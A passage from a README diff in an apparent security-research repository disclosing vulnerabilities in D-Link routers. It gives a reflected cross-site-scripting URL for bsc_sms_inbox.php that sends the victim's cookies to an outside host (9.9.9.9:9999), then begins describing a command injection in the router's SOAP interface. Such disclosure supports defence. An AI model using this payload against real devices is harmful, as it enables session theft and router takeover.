soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto/README.md

 An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc_sms_inbox.php?Treturn=0';window.open('http://9.9.9.9:9999/cookie.asp?msg='+document.cookie);get_Treturn='1

-3. Command injection in SOAP controlType url interface
+## 0x04 Details - LAN - revA/B - Command injection in SOAP controlType url interface

 The vulnerability occurs in /htdocs/cgibin which is executed by the web server for, just handles almost http requests from WAN and LAN, and my research in analyzing SOAP interface started from a security analysis report regarding UPNP protocol, then I reviewed the SOAP interface, which is handled by the soapcgi_main function in cgibin, seems to have been mostly overlooked.